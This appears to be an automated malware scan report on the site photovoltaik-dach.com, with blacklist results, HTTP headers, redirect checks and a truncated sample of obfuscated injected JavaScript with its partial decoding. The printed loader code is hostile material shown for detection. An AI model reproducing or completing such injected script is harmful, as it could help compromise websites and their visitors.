Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=photovoltaik-dach.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://photovoltaik-dach.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://photovoltaik-dach.com/ | 200 OK Content-Length: 13621 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) d='function $M(file -z ?P L-B="GE <= a ,rt="" Ke ,E=tru & ,r.offset=100 Un L-L @u @y @J LA9 N ,e @q LA9 N Um L-n ],P ]Urg L-k(); .sxml2 X1 A.icrosoft X2 -z=null}}if(! z Ztypeof M!="undefined" -z : M ]+ E= 4}} Uc _> -t[ $o [>,false) Uv _>, =vars Z 4== =vars A= /( % $o), % >)) + t[ % $o) [% >) W} UH L$p, $S A$T= % Yx);regexp :RegExp( Yx+"|"+ $T); H/ Sp 6regexp) Ii=0;i< H/ hj= H/[i] 6"=");if( 4= SS -v G + c G}}}; a.trim _$f Z"qabcdef".indexOf( $o.substr(0,1))>=0){ H Decoded script: function kx_M(file){this.kx_z=null;this.kx_P=function(){this.kx_B="GET";this.kx_i="?";this.kx_rx="&";this.kx_r=window;this.kx_rt="";this.kx_b=true;this.kx_w=false;this.kx_E=true;this.kx_rr=null;this.kx_A=null;this.kx_F=file;this.kx_t=new Object();this.kx_C=new Array(2);this.kx_r.offset=100};this.kx_n=function(){this.kx_L=function(){};this.kx_u=function(){};this.kx_y=function(){};this.kx_J=function(){this.runResponse()};this.kx_e=function(){};this.kx_q=function(){this.runResponse()}};thi Antivirus reports:
| ||
http://photovoltaik-dach.com/test404page.js | 404 Not Found Content-Length: 1363 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: photovoltaik-dach.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 05 Aug 2014 08:38:15 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=7f118f89311477e512138005f9c66937; path=/
X-Powered-By: PHP/4.4.9
GET / HTTP/1.1
Host: photovoltaik-dach.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 05 Aug 2014 08:38:15 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=7f118f89311477e512138005f9c66937; path=/
X-Powered-By: PHP/4.4.9
Second query (visit from search engine):
GET / HTTP/1.1
Host: photovoltaik-dach.com
Referer: http://www.google.com/search?q=photovoltaik-dach.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: photovoltaik-dach.com
Referer: http://www.google.com/search?q=photovoltaik-dach.com
Result:
The result is similar to the first query. There are no suspicious redirects found.